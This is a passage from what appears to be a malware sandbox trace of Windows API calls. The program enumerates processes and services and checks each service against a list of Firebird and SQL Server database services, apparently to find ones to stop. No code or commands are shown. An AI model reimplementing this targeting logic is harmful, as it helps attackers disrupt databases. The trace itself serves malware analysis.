lpString2="SecurityHealthService") returned 1 [0290.672] lstrlenW (lpString="SENS") returned 4 [0290.672] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0290.672] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0290.672] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0290.672] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0290.672] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0290.672] lstrlenW (lpString="ShellHWDetection") returned 16 [0290.672] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0290.672] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0290.672] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0290.672] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0290.672] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0290.672] lstrlenW (lpString="Spooler") returned 7 [0290.672] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0290.673] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0290.673] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0290.673] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0290.673] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0290.673] lstrlenW (lpString="StateRepository") returned 15 [0290.673] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0290.673] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0290.673] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0290.673] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0290.673] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0290.673] lstrlenW (lpString="SysMain") returned 7 [0290.673] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0290.673] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0290.673] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0290.673] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0290.673] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0290.673] lstrlenW (lpString="SystemEventsBroker") returned 18 [0290.673] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0290.673] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0290.673] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0290.673] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0290.674] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0290.674] lstrlenW (lpString="Themes") returned 6 [0290.674] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0290.674] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0290.674] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0290.674] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0290.674] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0290.674] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0290.674] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0290.674] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0290.674] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0290.674] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0290.674] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0290.674] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0290.674] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0290.674] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0290.674] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0290.674] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0290.675] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4015d98 | out: hHeap=0x470000) returned 1 [0290.675] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x43c [0290.851] Process32FirstW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.852] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.853] lstrlenW (lpString="System") returned 6 [0290.853] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.854] lstrlenW (lpString="smss.exe") returned 8 [0290.854] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.855] lstrlenW (lpString="csrss.exe") returned 9 [0290.855] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.856] lstrlenW (lpString="wininit.exe") returned 11 [0290.856] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.857] lstrlenW (lpString="csrss.exe") returned 9 [0290.857] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.858] lstrlenW (lpString="winlogon.exe") returned 12 [0290.858] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.859] lstrlenW (lpString="services.exe") returned 12 [0290.859] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.860] lstrlenW (lpString="lsass.exe") returned 9 [0290.860] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0290.861] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0290.861] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0290.862] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0290.862] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.863] lstrlenW (lpString="svchost.exe") returned 11 [0290.863] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.864] lstrlenW (lpString="svchost.exe") returned 11 [0290.864] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0290.865] lstrlenW (lpString="dwm.exe") returned 7 [0290.865] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.866] lstrlenW (lpString="svchost.exe") returned 11 [0290.866] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.867] lstrlenW (lpString="svchost.exe") returned 11 [0290.867] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.869] lstrlenW (lpString="svchost.exe") returned 11 [0290.869] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.870] lstrlenW (lpString="svchost.exe") returned 11 [0290.870] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.871] lstrlenW (lpString="svchost.exe") returned 11 [0290.871] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.872] lstrlenW (lpString="svchost.exe") returned 11 [0290.872] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.873] lstrlenW (lpString="svchost.exe") returned 11 [0290.873] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.874] lstrlenW (lpString="svchost.exe") returned 11 [0290.874] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.875] lstrlenW (lpString="svchost.exe") returned 11 [0290.875] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.876] lstrlenW (lpString="svchost.exe") returned 11 [0290.876] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0290.877] lstrlenW (lpString="spoolsv.exe") returned 11 [0290.877] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.878] lstrlenW (lpString="svchost.exe") returned 11 [0290.878] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0290.879] lstrlenW (lpString="audiodg.exe") returned 11 [0290.879] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0291.117] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0291.117] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0291.118] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0291.118] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0291.119] lstrlenW (lpString="Memory Compression") returned 18 [0291.119] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0291.120] lstrlenW (lpString="sihost.exe") returned 10 [0291.120] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.121] lstrlenW (lpString="svchost.exe") returned 11 [0291.121] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0291.121] lstrlenW (lpString="taskhostw.exe") returned 13 [0291.122] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.122] lstrlenW (lpString="explorer.exe") returned 12 [0291.122] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0291.123] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0291.123] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0291.124] lstrlenW (lpString="SearchUI.exe") returned 12 [0291.124] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0291.125] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0291.125] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.126] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0291.126] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0291.127] lstrlenW (lpString="mobsync.exe") returned 11 [0291.127] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0291.128] lstrlenW (lpString="wdgmug.exe") returned 10 [0291.128] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0291.128] lstrlenW (lpString="cmd.exe") returned 7 [0291.128] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0291.129] lstrlenW (lpString="conhost.exe") returned 11 [0291.129] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0291.130] lstrlenW (lpString="wdgmug.exe") returned 10 [0291.130] Process32NextW (in: hSnapshot=0x43c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 0 [0291.131] CloseHandle (hObject=0x43c) returned 1 [0291.131] Sleep (dwMilliseconds=0x1f4) [0291.947] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4013cf0 [0291.950] EnumServicesStatusExW (in: hSCManager=0x4013cf0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0291.951] GetLastError () returned 0xea [0291.951] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x4015d98 [0291.951] EnumServicesStatusExW (in: hSCManager=0x4013cf0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4015d98, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4015d98, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0291.953] CloseServiceHandle (hSCObject=0x4013cf0) returned 1 [0291.953] lstrlenW (lpString="AppXSvc") returned 7 [0291.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0291.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0291.953] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0291.953] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0291.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0291.953] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0291.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0291.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0291.954] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0291.954] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0291.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0291.954] lstrlenW (lpString="Audiosrv") returned 8 [0291.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0291.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0291.954] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0291.954] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0291.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0291.954] lstrlenW (lpString="BFE") returned 3 [0291.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0291.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0291.954] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0291.954] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0291.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0291.955] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0291.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0291.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0291.955] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0291.955] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0291.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0291.955] lstrlenW (lpString="CDPSvc") returned 6 [0291.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0291.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0291.955] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0291.955] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0291.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0291.955] lstrlenW (lpString="ClickToRunSvc") returned 13 [0291.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0291.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0291.955] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0291.955] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0291.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0291.956] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0291.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0291.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0291.956] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0291.956] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0291.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0291.956] lstrlenW (lpString="CryptSvc") returned 8 [0291.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0291.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0291.956] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0291.956] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0291.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0291.956] lstrlenW (lpString="DcomLaunch") returned 10 [0291.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0291.956] lstrcmpiW 